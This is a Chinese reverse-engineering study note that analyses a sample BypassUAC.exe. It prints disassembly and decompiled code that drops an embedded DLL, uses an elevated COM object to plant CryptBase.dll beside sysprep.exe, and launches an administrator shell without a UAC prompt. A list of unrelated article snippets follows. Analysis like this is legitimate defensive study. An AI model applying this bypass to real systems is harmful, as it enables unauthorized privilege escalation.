H4ppyD0g

[系统安全]《黑客免杀攻防》MFC逆向基础实战

本文为笔者从零基础学习系统安全相关内容的笔记，如果您对系统安全、逆向分析等内容感兴趣或者想要了解一些内容，欢迎关注。本系列文章将会随着笔者在未来三年的读研过程中持续更新，由于笔者现阶段还处于初学阶段，不可避免参照复现各类书籍内容，如书籍作者认为侵权请告知，笔者将立刻删除。强调本系列所有内容仅作为学习研究使用，作者对此文章中的代码造成的任何后果不负法律责任。

前文链接
[系统安全] PE文件格式详解1
[系统安全] PE文件格式详解2
[系统安全] Windbg Preview调试记录

文章目录

前驱知识点总结
逆向实战BypassUAC.exe程序

前驱知识点总结

用户帐户控制（User Account Control，简写作UAC) 是微软公司在其
Windows Vista及更高版本操作系统中采用的一种控制机制。
其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权，
以达到帮助阻止恶意程序（有时也称为“恶意软件”）损坏系统的效果。

微软基础类库（Microsoft Foundation Classes，简称MFC）
是微软公司提供的一个类库，以C++类的形式封装了Windows API，
并且包含一个应用程序框架，以减少应用程序开发人员的工作量。
其中包含大量Windows句柄封装类和很多Windows的内建控件和组件的封装类。

MFC调用特征总结

版本	对应动态库	静态库中使用MFC特征	动态库使用MFC特征
4.0	mfc40.dll	call [ebp+0x14]	call [ebp+0x14]
6.0	mfc42.dll	call [ebp+0x14]	call [ebp+0x14]
7.1	mfc71.dll	call [ebp+0x14]	call [ebp+0x14]
10.0	mfc100.dll	call [ebp+0x14]	mov edx, [ebp+0x14]

对于MFC程序的逆向，分为以下步骤

OllyDbg打开程序，按图标e打开模块窗口
if(查找到mfc*.dll){
	判断MFC版本
	if(找不到版本信息){
		可能是在静态库中使用MFC，或者不是MFC程序
	}
}


if(动态库中使用MFC){
	双击对应动态库，转到响应代码起始位置，ctrl+f搜索特征
}else if(静态库中使用MFC){
	在起始位置搜索特征
}

逆向实战BypassUAC.exe程序

分析的例子是黑客免杀攻防书里一个由MFC编写的名为BypassUAC.exe程序，
此程序的功能是不触发UAC情况下打开管理员权限的命令行。功能效果如下图，接下来进行分析。

载入OD，打开模块窗口，如下所示

没有发现MFC动态加载库文件，判断可能是静态调用MFC或者不是MFC程序

搜索特征call [ebp+0x14]，由于这个特征位于mfc框架里的消息分发函数里，所以处在一个很大的switch-case中。
上面的jmp dword ptr ds:[eax*4+1368c62]就是典型的处理复杂switch-case语句特征。

书上说单击按钮的值是0x39，设置断点跟进后发现调用了两个函数，获取当前模块的句柄，调用RemoteLoadDllByResource函数

参数explorer.exe则是远程加载dll文件的宿主名，SHELL_CODE则是资源名。

使用LordPE打开文件

dump下来保存为dll格式文件，然后用IDA打开

.text:10001000 ; =============== S U B R O U T I N E =======================================
.text:10001000
.text:10001000 ; Attributes: bp-based frame
.text:10001000
.text:10001000 ; BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
.text:10001000 _DllMain@12     proc near               ; CODE XREF: ___DllMainCRTStartup+75↓p
.text:10001000                                         ; ___DllMainCRTStartup+89↓p
.text:10001000
.text:10001000 NumberOfBytesWritten= dword ptr -828h
.text:10001000 Buffer          = word ptr -824h
.text:10001000 Dst             = byte ptr -822h
.text:10001000 var_61C         = word ptr -61Ch
.text:10001000 var_61A         = byte ptr -61Ah
.text:10001000 Src             = word ptr -414h
.text:10001000 var_412         = byte ptr -412h
.text:10001000 TempFileName    = word ptr -20Ch
.text:10001000 var_20A         = byte ptr -20Ah
.text:10001000 var_4           = dword ptr -4
.text:10001000 hinstDLL        = dword ptr  8
.text:10001000 fdwReason       = dword ptr  0Ch
.text:10001000 lpvReserved     = dword ptr  10h
.text:10001000
.text:10001000                 push    ebp
.text:10001001                 mov     ebp, esp
.text:10001003                 sub     esp, 828h
.text:10001009                 mov     eax, ___security_cookie
.text:1000100E                 xor     eax, ebp
.text:10001010                 mov     [ebp+var_4], eax
.text:10001013                 mov     eax, [ebp+fdwReason]
.text:10001016                 dec     eax
.text:10001017                 push    edi
.text:10001018                 mov     edi, [ebp+hinstDLL]
.text:1000101B                 jnz     loc_100011E7
.text:10001021                 push    esi
.text:10001022                 push    offset Type     ; "BIN_DLL"
.text:10001027                 push    65h             ; lpName
.text:10001029                 push    edi             ; hModule
.text:1000102A                 call    ds:FindResourceW ; //FindResourceW(hModule, lpName, "BIN_DLL")
.text:10001030                 mov     esi, eax
.text:10001032                 test    esi, esi
.text:10001034                 jz      loc_100011E6    ; //如果返回值为0,则跳转到末尾附近
.text:1000103A                 push    esi             ; hResInfo
.text:1000103B                 push    edi             ; hModule
.text:1000103C                 call    ds:LoadResource ; //LoadResource(hModule, hResInfo)
.text:10001042                 test    eax, eax
.text:10001044                 jz      loc_100011E6    ; //如果返回值为0，则跳转到函数结尾附近
.text:1000104A                 push    ebx
.text:1000104B                 push    eax             ; hResData   //注意这里有些问题，跟参考书上分析的代码对不起来
.text:1000104C                 call    ds:LockResource
.text:10001052                 mov     ebx, eax
.text:10001054                 test    ebx, ebx
.text:10001056                 jz      loc_100011E5
.text:1000105C                 push    esi             ; hResInfo
.text:1000105D                 push    edi             ; hModule
.text:1000105E                 call    ds:SizeofResource
.text:10001064                 mov     edi, eax
.text:10001066                 test    edi, edi
.text:10001068                 jz      loc_100011E5
.text:1000106E                 xor     eax, eax
-------------------------------------------------------------
HRSRC hResInfo;
HGLOBAL hResData;
LPVOID lpData;
DwORD dwFilesize;
hResInfo=FindResourceW(hModule，lpName，"BIN_DLL")
if (hResInfo==NULL)
	return;
hResData=LoadResource(hModule,hResInfo)
if(hResData==NULL)
	return;
lpData=LockResource(hModule,hResData)
if (lpData==NULL)
	return;
dwFilesize=sizeofResource( hModule,hResInfo)
if (dwFilesize==NULL)
	return;
到此得出结论我们dump下来的这个dll还会加载BIN_DLL动态库文件
-------------------------------------------------------------
.text:10001070                 push    206h            ; Size
.text:10001075                 push    eax             ; Val
.text:10001076                 lea     ecx, [ebp+Dst]
.text:1000107C                 push    ecx             ; Dst
.text:1000107D                 mov     [ebp+NumberOfBytesWritten], 0
.text:10001087                 mov     [ebp+Buffer], ax
.text:1000108E                 call    memset
.text:10001093                 xor     edx, edx
.text:10001095                 push    206h            ; Size
.text:1000109A                 push    edx             ; Val
.text:1000109B                 lea     eax, [ebp+var_20A]
.text:100010A1                 push    eax             ; Dst
.text:100010A2                 mov     [ebp+TempFileName], dx
.text:100010A9                 call    memset
.text:100010AE                 add     esp, 18h
.text:100010B1                 lea     ecx, [ebp+Buffer]
.text:100010B7                 push    ecx             ; lpBuffer
.text:100010B8                 push    104h            ; nBufferLength
.text:100010BD                 call    ds:GetTempPathW    ;//GetTempPathW(nBufferLength, lpBuffer)
.text:100010C3                 test    eax, eax
.text:100010C5                 jz      loc_100011E5     ;//如果返回值为0，跳转到函数末尾处
.text:100010CB                 lea     edx, [ebp+TempFileName]
.text:100010D1                 push    edx             ; lpTempFileName
.text:100010D2                 push    0               ; uUnique
.text:100010D4                 push    offset PrefixString ; "A1_"
.text:100010D9                 lea     eax, [ebp+Buffer]
.text:100010DF                 push    eax             ; lpPathName ;//lpPathName=GetTempPathW(nBufferLength, lpBuffer)
.text:100010E0                 call    ds:GetTempFileNameW  ;//GetTempFileNameW(lpPathName, "A1_", uUnique, lpTempFileName)
.text:100010E6                 test    eax, eax
.text:100010E8                 jz      loc_100011E5     ;//如果返回值为0，跳转到函数末尾处
.text:100010EE                 push    0               ; hTemplateFile
.text:100010F0                 push    80h             ; dwFlagsAndAttributes
.text:100010F5                 push    2               ; dwCreationDisposition
.text:100010F7                 push    0               ; lpSecurityAttributes
.text:100010F9                 push    0               ; dwShareMode
.text:100010FB                 push    40000000h       ; dwDesiredAccess
.text:10001100                 lea     ecx, [ebp+TempFileName]
.text:10001106                 push    ecx             ; lpFileName
.text:10001107                 call    ds:CreateFileW   ;//CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)
.text:1000110D                 mov     esi, eax
.text:1000110F                 cmp     esi, 0FFFFFFFFh
.text:10001112                 jz      loc_100011E5 //返回值为-1时跳转到函数末尾处
.text:10001118                 push    0               ; lpOverlapped
.text:1000111A                 lea     edx, [ebp+NumberOfBytesWritten]
.text:10001120                 push    edx             ; lpNumberOfBytesWritten
.text:10001121                 push    edi             ; nNumberOfBytesToWrite
.text:10001122                 push    ebx             ; lpBuffer
.text:10001123                 push    esi             ; hFile  ;//hFile=CreateFileW(...)
.text:10001124                 call    ds:WriteFile ;//WriteFile(hFile, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten, lpOverlapped)
.text:1000112A                 test    eax, eax
.text:1000112C                 jz      loc_100011E5 ;//如果返回值为0，跳转到函数末尾处
.text:10001132                 push    esi             ; hObject(就是hFile)
.text:10001133                 call    ds:CloseHandle   ;//CloseHandle(hObject)
.text:10001139                 xor     eax, eax
-------------------------------------------------------------
以上代码是在此dll中读出一段数据，保存在系统的临时目录中，
文件名是一个A1_开头临时文件
-------------------------------------------------------------
.text:1000113B                 push    206h            ; Size
.text:10001140                 push    eax             ; Val
.text:10001141                 lea     ecx, [ebp+var_412]
.text:10001147                 push    ecx             ; Dst
.text:10001148                 mov     [ebp+Src], ax
.text:1000114F                 call    memset
.text:10001154                 xor     edx, edx
.text:10001156                 push    206h            ; Size
.text:1000115B                 push    edx             ; Val
.text:1000115C                 lea     eax, [ebp+var_61A]
.text:10001162                 push    eax             ; Dst
.text:10001163                 mov     [ebp+var_61C], dx
.text:1000116A                 call    memset
.text:1000116F                 add     esp, 18h

.text:10001172                 push    104h            ; uSize
.text:10001177                 lea     ecx, [ebp+Src]
.text:1000117D                 push    ecx             ; lpBuffer
.text:1000117E                 call    ds:GetSystemDirectoryW   ;//GetSystemDirectoryW(lpBuffer, uSize)
.text:10001184                 test    eax, eax
.text:10001186                 jz      short loc_100011D8   //如果返回值为0，跳转到末尾附近
.text:10001188                 push    104h            ; MaxCount
.text:1000118D                 lea     edx, [ebp+Src]
.text:10001193                 push    edx             ; Src
.text:10001194                 lea     eax, [ebp+var_61C]
.text:1000119A                 push    104h            ; SizeInWords
.text:1000119F                 push    eax             ; Dst
.text:100011A0                 call    ds:wcsncpy_s ;//wcsncpy_s(Dst, SizeInWords, Src, MaxCount)
.text:100011A6                 push    offset Src      ; "\\cmd.exe"
.text:100011AB                 lea     ecx, [ebp+var_61C]
.text:100011B1                 push    104h            ; SizeInWords
.text:100011B6                 push    ecx             ; Dst
.text:100011B7                 call    ds:wcscat_s  ;//wcscat_s(Dst[即[ebp+var_61C]], SizeInWords, "\\cmd.exe")
.text:100011BD                 add     esp, 1Ch
-------------------------------------------------------------
获取cmd.exe完整路径保存到[ebp+var_61C]
-------------------------------------------------------------
.text:100011C0                 lea     edx, [ebp+TempFileName]
.text:100011C6                 push    edx
.text:100011C7                 lea     edx, [ebp+Src]
.text:100011CD                 lea     ecx, [ebp+var_61C]
.text:100011D3                 call    sub_10001200 ;//sub_10001200([ebp+TempFileName])，肯定也用到[ebp+Src]和[ebp+var_61C]
.text:100011D8
.text:100011D8 loc_100011D8:                           ; CODE XREF: DllMain(x,x,x)+186↑j
.text:100011D8                 lea     eax, [ebp+TempFileName]
.text:100011DE                 push    eax             ; lpFileName
.text:100011DF                 call    ds:DeleteFileW   ;//DeleteFileW(lpFileName)
.text:100011E5
.text:100011E5 loc_100011E5:                           ; CODE XREF: DllMain(x,x,x)+56↑j
.text:100011E5                                         ; DllMain(x,x,x)+68↑j ...
.text:100011E5                 pop     ebx
.text:100011E6
.text:100011E6 loc_100011E6:                           ; CODE XREF: DllMain(x,x,x)+34↑j
.text:100011E6                                         ; DllMain(x,x,x)+44↑j
.text:100011E6                 pop     esi
.text:100011E7
.text:100011E7 loc_100011E7:                           ; CODE XREF: DllMain(x,x,x)+1B↑j
.text:100011E7                 mov     ecx, [ebp+var_4]
.text:100011EA                 xor     ecx, ebp
.text:100011EC                 mov     eax, 1
.text:100011F1                 pop     edi
.text:100011F2                 call    @__security_check_cookie@4 ; __security_check_cookie(x)
.text:100011F7                 mov     esp, ebp
.text:100011F9                 pop     ebp
.text:100011FA                 retn    0Ch
.text:100011FA _DllMain@12     endp
.text:100011FA
.text:100011FA ; ---------------------------------------------------------------------------
.text:100011FD                 align 10h

将当前dll资源中的数据保存在临时目录下的FileName中，
然后获取cmd.exe文件完整路径，再将FileName作为参数传入sub_10001200中，
函数执行完后删除临时目录中的FileName文件。

下面查看sub_10001200函数

char __fastcall sub_10001200(int a1, int a2, int a3)
{
  .........

  if ( GetSystemDirectoryW(&Buffer, 0x104u) )   //获取系统目录到Buffer
  {
    wcscat_s(&Buffer, 0x104u, L"\\sysprep");
    wcsncpy_s(&v22, 0x104u, &Buffer, 0x104u);
    wcscat_s(&v22, 0x104u, L"\\sysprep.exe");
    wcsncpy_s(&v20, 0x104u, &Buffer, 0x104u);
    wcscat_s(&v20, 0x104u, L"\\sysprep.dll");
  }
  //Buffer = "系统目录\\sysgrep"
  //v22 = "系统目录\\sysgrep\\sysgrep.exe"
  //v20 = "系统目录\\sysgrep\\sysgrep.dll"
  //sysgrep.exe是windows下系统准备工具，可以执行系统封装或磁盘复制等操作
  //sysgrep.exe与sysgrep.dll正常情况下不在一个目录下，如果我们在exe同目录下准备一个dll的话就会首先使用我们准备的dll文件

  if ( CoInitialize(0)
    || CoGetObject(L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}", &pBindOptions, &riid, &ppv)
    || !ppv
    || (*(int (__stdcall **)(void *, signed int))(*(_DWORD *)ppv + 20))(ppv, 277086228)
    || SHCreateItemFromParsingName(v7, 0, &unk_10002268, &v10)
    || !v10
    || SHCreateItemFromParsingName(&Buffer, 0, &unk_10002268, &v8)
    || !v8
    || (*(int (__stdcall **)(void *, int, int, const wchar_t *, _DWORD))(*(_DWORD *)ppv + 64))(
         ppv, v10, v8, L"CryptBase.dll", 0)
    || (*(int (__stdcall **)(void *))(*(_DWORD *)ppv + 84))(ppv) )
  {
    return 0;
  }
    //SHCreateItemFromParsingName是从解析的路径名中创建并初始化一个shell对象，
    //v7就是当前函数的第三个参数
  memset(&pExecInfo, 0, 0x3Cu);
  pExecInfo.lpFile = &v22;  //v22 = "系统目录\\sysgrep\\sysgrep.exe"
  pExecInfo.cbSize = 60;
  pExecInfo.fMask = 64;
  pExecInfo.lpParameters = &v18;
  pExecInfo.lpDirectory = &Buffer;
  pExecInfo.nShow = 5;
  if ( ShellExecuteExW(&pExecInfo) && pExecInfo.hProcess )
  {
    WaitForSingleObject(pExecInfo.hProcess, 0xFFFFFFFF);
    CloseHandle(pExecInfo.hProcess);
  }
  if ( SHCreateItemFromParsingName(&v20, 0, &unk_10002268, &v9) || !v9 )
    return 0;
  if ( !(*(int (__stdcall **)(void *, int, _DWORD))(*(_DWORD *)ppv + 72))(ppv, v9, 0) )
    (*(void (__stdcall **)(void *))(*(_DWORD *)ppv + 84))(ppv);
  if ( v9 )
    (*(void (__stdcall **)(int))(*(_DWORD *)v9 + 8))(v9);
  if ( v8 )
    (*(void (__stdcall **)(int))(*(_DWORD *)v8 + 8))(v8);
  if ( v10 )
    (*(void (__stdcall **)(int))(*(_DWORD *)v10 + 8))(v10);
  if ( ppv )
    (*(void (__stdcall **)(void *))(*(_DWORD *)ppv + 8))(ppv);
  CoUninitialize();
  return 1;
}

ShellExecuteExW运行一个外部可执行文件，也就是上面准备好的sysgrep.exe而sysgrep.dll被程序劫持，换成自己的dll文件，在此文件中以管理员身份运行了cmd。

微服务下功能权限与数据权限的设计与实现 nbsaas-boot 微服务 java 架构
在微服务架构下，系统的功能权限和数据权限控制显得尤为重要。随着系统规模的扩大和微服务数量的增加，如何保证不同用户和服务之间的访问权限准确、细粒度地控制，成为设计安全策略的关键。本文将讨论如何在微服务体系中设计和实现功能权限与数据权限控制。1.功能权限与数据权限的定义功能权限：指用户或系统角色对特定功能的访问权限。通常是某个用户角色能否执行某个操作，比如查看订单、创建订单、修改用户资料等。数据权限：
c++ 的iostream 和 c++的stdio的区别和联系黄卷青灯77 c++算法开发语言 iostream stdio
在C++中，iostream和C语言的stdio.h都是用于处理输入输出的库，但它们在设计、用法和功能上有许多不同。以下是两者的区别和联系：区别1.编程风格iostream（C++风格）：C++标准库中的输入输出流类库，支持面向对象的输入输出操作。典型用法是cin（输入）和cout（输出），使用>操作符来处理数据。更加类型安全，支持用户自定义类型的输入输出。#includeintmain(){in
Long类型前后端数据不一致 igotyback 前端
响应给前端的数据浏览器控制台中response中看到的Long类型的数据是正常的到前端数据不一致前后端数据类型不匹配是一个常见问题，尤其是当后端使用Java的Long类型（64位）与前端JavaScript的Number类型（最大安全整数为2^53-1，即16位）进行数据交互时，很容易出现精度丢失的问题。这是因为JavaScript中的Number类型无法安全地表示超过16位的整数。为了解决这个问
特殊的拜年飘雪的天堂
文/雪儿大年初一，家家户户没有了轰响的鞭炮声，大街上没有了人流涌动的喧闹，几乎看不到人影，变得冷冷清清。天刚亮不大会儿，村里的大喇叭响了起来：由于当前正值疾病高发期，流感流行的高峰期。同时，新型冠状病毒感染的肺炎进入第二波流行的上升期。为了自己和他人的健康安全着想，请大家尽量不要串门拜年，不要在街里走动。可以通过手机微信，视频，电话，信息拜年……今年的春节真是特别。禁止燃放鞭炮，烟花爆竹，禁止出村
【华为OD技术面试真题 - 技术面】-测试八股文真题题库（1）算法大师华为od 面试 python 算法前端
华为OD面试真题精选专栏：华为OD面试真题精选目录:2024华为OD面试手撕代码真题目录以及八股文真题目录文章目录华为OD面试真题精选1.黑盒测试和白盒测试的区别2.假设我们公司现在开发一个类似于微信的软件1.0版本，现在要你测试这个功能：打开聊天窗口，输入文本，限制字数在200字以内。问你怎么提取测试点。功能测试性能测试安全性测试可用性测试跨平台兼容性测试网络环境测试3.接口测试的工具你了解哪些
直返的东西正品吗?直返APP安全吗?直返是正规平台吗? 氧惠购物达人
亲们，你们是不是经常在直返APP上买东西呀？但是，你们有没有想过，里面的东西到底是不是正品呢？这个APP安全吗？它是不是一个正规的平台呀？别着急，今天我就来给大家揭秘一下！氧惠APP（带货领导者）——是与以往完全不同的抖客+淘客app！2023全新模式，我的直推也会放到你下面。主打：带货高补贴，深受各位带货团队长喜爱（每天出单带货几十万单）。注册即可享受高补贴+0撸+捡漏等带货新体验。送万元推广大
EIO国际确定性的交易（3/10）资管，资金委托安全吗？古城鹏哥
大家可能都知道资金托管，账户是自己开，钱在自己的账户上，密码是由自己掌控，别人提不走你账户的资金，每天可以看下到自己的账户，也可以看到交易流水。现金只能提到自己的银行卡中。账户由技术人员或操作人员，或者是机构团队帮你操作账户，产生盈利和收入，以获得的利润来分配盈利，技术强硬和做的时间久了过硬技术团队，会保证你的资金本金，不会让你的本金亏损的按照一定比例分配收入。所以在这个过程当中一定要看清楚技术的
TDengine 签约前晨汽车，解锁智能出行的无限潜力涛思数据（TDengine） tdengine 汽车大数据
在全球汽车产业转型升级的背景下，智能网联和新能源技术正迅速成为商用车行业的重要发展方向。随着市场对环保和智能化需求的日益增强，企业必须在技术创新和数据管理上不断突破，以满足客户对高效、安全和智能出行的期待。在这一背景下，前晨汽车凭借其在新能源智能商用车领域的前瞻性布局和技术实力，成为行业中的佼佼者。前晨汽车采用整车数据采集和全车数据打通策略，能够实时将数据推送至APP端客户。然而，这导致整体写入和
“这才好”麻辣香锅能够增加人身体的免疫能力小补文知
我就来介绍一种香锅，那就是“这才好”麻辣香锅，它产出于著名的蜀地文化，具有悠久的历史土家风味，麻辣鲜香，健康安全。采用传统秘制麻辣香锅油辣子，还有贴心加料“孜然包”满足人们的不同口味需求，香锅底料辣椒，微辣且香，含有丰富微量元素和维生素，具有辣而不躁，味道纯正，醇厚温和。花椒采用历史悠久，被列为宫廷供品的“贡椒”的汉源花椒。我们还挑选了“川菜之魂”郫县豆瓣的鼻祖品牌豆瓣，保留最原始的郫县豆瓣味道，
Java面试题精选：消息队列(二) 芒果不是芒 Java面试题精选 java kafka
一、Kafka的特性1.消息持久化：消息存储在磁盘，所以消息不会丢失2.高吞吐量：可以轻松实现单机百万级别的并发3.扩展性：扩展性强，还是动态扩展4.多客户端支持：支持多种语言（Java、C、C++、GO、）5.KafkaStreams（一个天生的流处理）:在双十一或者销售大屏就会用到这种流处理。使用KafkaStreams可以快速的把销售额统计出来6.安全机制：Kafka进行生产或者消费的时候会
Kafka是如何保证数据的安全性、可靠性和分区的喜欢猪猪 kafka 分布式
Kafka作为一个高性能、可扩展的分布式流处理平台，通过多种机制来确保数据的安全性、可靠性和分区的有效管理。以下是关于Kafka如何保证数据安全性、可靠性和分区的详细解析：一、数据安全性SSL/TLS加密：Kafka支持SSL/TLS协议，通过配置SSL证书和密钥来加密数据传输，确保数据在传输过程中不会被窃取或篡改。这一机制有效防止了中间人攻击，保护了数据的安全性。SASL认证：Kafka支持多种
2022-10-10 幸福芳芳
10.10日觉察日记1.事件：开晨会员工来不齐，路远的请假，离得近的也请假，一律不批！2.感受：生气，气愤（情绪如何转化或使用）3.想法：1.今年已经很少开晨会了，非必要不会通知开会的，临近点了再打电话请假，又不是特别忙的季节，借口都会找～～2.不来的按公司标准执行负激励，待岗处理！我为你们负责，你们安全重要会议都不参加，自己都不为自己负责！以后有事也别找我！尤其是经销商老板，自己都不清楚自己用工
MongoDB知识概括 GeorgeLin98 持久层 mongodb
MongoDB知识概括MongoDB相关概念单机部署基本常用命令索引-IndexSpirngDataMongoDB集成副本集分片集群安全认证MongoDB相关概念业务应用场景：传统的关系型数据库（如MySQL），在数据操作的“三高”需求以及应对Web2.0的网站需求面前，显得力不从心。解释：“三高”需求：①Highperformance-对数据库高并发读写的需求。②HugeStorage-对海量数
计算机木马详细编写思路小熊同学哦 php 开发语言木马木马思路
导语：计算机木马（ComputerTrojan）是一种恶意软件，通过欺骗用户从而获取系统控制权限，给黑客打开系统后门的一种手段。虽然木马的存在给用户和系统带来严重的安全风险，但是了解它的工作原理与编写思路，对于我们提高防范意识、构建更健壮的网络安全体系具有重要意义。本篇博客将深入剖析计算机木马的详细编写思路，以及如何复杂化挑战，以期提高读者对计算机木马的认识和对抗能力。计算机木马的基本原理计算机木
基于STM32的汽车仪表显示系统：集成CAN、UART与I2C总线设计流程极客小张 stm32 汽车嵌入式硬件物联网单片机 c语言
一、项目概述项目目标与用途本项目旨在设计和实现一个基于STM32微控制器的汽车仪表显示系统。该系统能够实时显示汽车的速度、转速、油量等关键信息，并通过CAN总线与其他汽车控制单元进行通信。这种仪表显示系统不仅提高了驾驶的安全性和便捷性，还能为汽车提供更智能的用户体验。技术栈关键词微控制器：STM32显示技术：TFTLCD/OLED传感器：速度传感器、温度传感器、油量传感器通信协议：CAN总线、UA
3286、穿越网格图的安全路径 Lenyiin 题解 c++算法 leetcode
3286、[中等]穿越网格图的安全路径1、题目描述给你一个mxn的二进制矩形grid和一个整数health表示你的健康值。你开始于矩形的左上角(0,0)，你的目标是矩形的右下角(m-1,n-1)。你可以在矩形中往上下左右相邻格子移动，但前提是你的健康值始终是正数。对于格子(i,j)，如果grid[i][j]=1，那么这个格子视为不安全的，会使你的健康值减少1。如果你可以到达最终的格子，请你返回tr
不安全依恋徐猛_Merlin
11.2不安全依恋在关系中自由的心里是不受她人情绪所影响和去发展新的关系两种。而不安全的依恋是对自己的关系存在恐惧的因素，也就是对周边的环境很陌生，而当在这个环境中存在一个熟悉的声音就是一种安全的依恋。这种依恋可能是一个熟悉的表情或者熟悉的面庞等等。
【Python搞定车载自动化测试】——Python实现车载以太网DoIP刷写（含Python源码）疯狂的机器人 Python搞定车载自动化 python DoIP UDS ISO 14229 1SO 13400 Bootloader tcp/ip
系列文章目录【Python搞定车载自动化测试】系列文章目录汇总文章目录系列文章目录前言一、环境搭建1.软件环境2.硬件环境二、目录结构三、源码展示1.DoIP诊断基础函数方法2.DoIP诊断业务函数方法3.27服务安全解锁4.DoIP自动化刷写四、测试日志1.测试日志五、完整源码链接前言随着智能电动汽车行业的发展，汽车=智能终端+四个轮子，各家车企都推出了各自的OTA升级方案，本章节主要介绍如何使
4 大低成本娱乐方式: 小说, 音乐, 视频, 电子游戏穷人小水滴娱乐音视频低成本小说游戏
穷人如何获得快乐?小说,音乐,视频,游戏,本文简单盘点一下这4大低成本(安全)娱乐方式.这里是穷人小水滴,专注于穷人友好型低成本技术.(本文为58号作品.)目录1娱乐方式1.1小说(网络小说)1.2音乐1.3视频(b站)1.4游戏(电子游戏/计算机软件)2低成本:一只手机即可3总结与展望1娱乐方式这几种,也可以说是艺术的具体形式.更专业的说,(娱乐)是劳动力再生产的重要组成部分.使人放松,获得快乐
今天是总结薛帅
今天来个最后一天的总结。为什么要学习写作技巧呢？就如同建房子，如果想要住的安全、舒服，我们要先打地基，建房子的框架，这样才能随意的装修。那么我们要怎么建好才能建好写作的地基呢？1走直路，少弯路01利他：能够给别人带来价值。02吸引：吸住读者的眼球。03打动：打动人心，引起共鸣。04说服：用数据说话。05刻意：通过有意识的训练。06修改：好的文章至上修改10遍。07模仿：10万+的文章必有成功的道理
拼多多返现要输入身份证号码安全吗?拼单返现是什么? 优惠券高省
当我们谈到拼多多返现金活动时，很多朋友会担心提供身份证信息的安全性以及返现金额的真实性。今天，我就来为大家揭开这些疑虑的面纱，为大家提供一个清晰的答案。【高省】APP（高佣金领导者）是一个自用省钱佣金高，分享推广赚钱多的平台，百度有几百万篇报道，运行三年，稳定可靠。高省APP，是2021年推出的平台，0投资，0风险、高省APP佣金更高，模式更好，终端用户不流失。高省是公认的返利最高的软件。古楼导师
《驴友的朝圣》065 户外运动论坛，论户外运动之现在与未来经典老表
十几年来，我国户外运动蓬勃发展，已经形成全民参与热情。各类户外运动项目和形式层出不穷。各种户外运动装备产品花样百出。看着形势一派大好。但是，在这大好形势之下，仍存在着诸多的发展瓶颈及安全与管理问题，需要提请重视。为此，江城登山协会在本地召开了“户外运动论坛”，邀请市内户外运动俱乐部及体育系统领导一起研讨本地区户外运动发展的可持续性。2019年6月1日，论坛在世贸万锦大酒店的支持下，在其三层会议大厅
华为云分布式缓存服务DCS 8月新特性发布华为云PaaS服务小智华为云分布式缓存
分布式缓存服务（DistributedCacheService，简称DCS）是华为云提供的一款兼容Redis的高速内存数据处理引擎，为您提供即开即用、安全可靠、弹性扩容、便捷管理的在线分布式缓存能力，满足用户高并发及数据快速访问的业务诉求。此次为大家带来DCS8月的特性更新内容，一起来看看吧！
c++ 内存处理函数 heeheeai c++开发语言
在C语言的头文件中，memcpy和memmove函数都用于复制内存块，但它们在处理内存重叠方面存在关键区别：内存重叠:memcpy函数不保证在源内存和目标内存区域重叠时能够正确复制数据。如果内存区域重叠，memcpy的行为是未定义的，可能会导致数据损坏或程序崩溃。memmove函数能够安全地处理源内存和目标内存区域重叠的情况。它会确保在复制过程中不会覆盖尚未复制的数据，从而保证数据的完整性。效率:
每日OJ_牛客_马戏团（模拟最长上升子序列） GR鲸鱼 c++算法开发语言牛客数据结构
目录牛客_马戏团（模拟最长上升子序列）解析代码牛客_马戏团（模拟最长上升子序列）马戏团__牛客网搜狐员工小王最近利用假期在外地旅游，在某个小镇碰到一个马戏团表演，精彩的表演结束后发现团长正和大伙在帐篷前激烈讨论，小王打听了下了解到，马戏团正打算出一个新节目“最高罗汉塔”，即马戏团员叠罗汉表演。考虑到安全因素，要求叠罗汉过程中，站在某个人肩上的人应该既比自己矮又比自己瘦，或相等。团长想要本次节目中的
信息系统安全相关概念(上) YuanDaima2048 课程笔记基础概念安全信息安全笔记
文章总览：YuanDaiMa2048博客文章总览下篇:信息系统安全相关概念(下)信息系统安全相关概念[上]信息系统概述信息系统信息系统架构信息系统发展趋势：信息系统日趋大型化、复杂化信息系统面临的安全威胁信息系统安全架构设计--以云计算为例信息系统安全需求及安全策略自主访问控制策略DAC强制访问控制策略MAC信息系统概述信息系统用于收集、存储和处理数据以及传递信息、知识和数字产品的一组集成组件。几
【加密算法基础——RSA 加密】 XWWW668899 网络服务器笔记 python
RSA加密RSA（Rivest-Shamir-Adleman）加密是非对称加密，一种广泛使用的公钥加密算法，主要用于安全数据传输。公钥用于加密，私钥用于解密。RSA加密算法的名称来源于其三位发明者的姓氏：R:RonRivestS:AdiShamirA:LeonardAdleman这三位计算机科学家在1977年共同提出了这一算法，并发表了相关论文。他们的工作为公钥加密的基础奠定了重要基础，使得安全通
信息系统安全相关概念(下) YuanDaima2048 基础概念课程笔记安全
文章总览：YuanDaiMa2048博客文章总览上篇指路：信息系统安全相关概念(上)信息系统安全相关概念[下]信息系统风险评估安全风险评估信息系统等级保护网络安全法等级保护等级保护工作流程环境安全信息系统风险评估安全风险评估对信息系统整体安全态势的感知和对重大安全事件的预警，实现“事前能预防，事中能控制，事后能处理”。安全风险组成的四要素：信息系统资产（Asset）信息系统脆弱性（Vulnerab
APQP，ASPICE，敏捷，功能安全，预期安全，这些汽车行业的一堆标准二大宝贝安全架构
前言APQP,ASPICE,敏捷，功能安全，预期安全，PMP，PRICE2汽车行业的有这样一堆标准。我是半路出家来到汽车行业做项目经理的，对几个标准的感觉是，看了文档和各种解析之后还是一头雾水，不知道到底说了个啥，别人问我还是一脸懵逼。APQP（TS16949的最重要工具），ASPICE（软件）这些是质量标准，是优化整个公司体系的，但这套体系对项目管理有要求；敏捷，PMP这些是项目管理的标准；项目
探索ASPICE V3.1：汽车行业软件开发的中文指南阮懿同
探索ASPICEV3.1：汽车行业软件开发的中文指南ASPICE_V3.1中文版.pdf.zip项目地址:https://gitcode.com/open-source-toolkit/422a2在汽车软件工程领域，高质量的标准对于确保行车安全和提升用户体验至关重要。今天，我们为您介绍一个珍贵的开源宝藏——ASPICEV3.1中文版资源。这是一篇专为国内汽车行业开发者、质量管理者准备的深度解读，旨
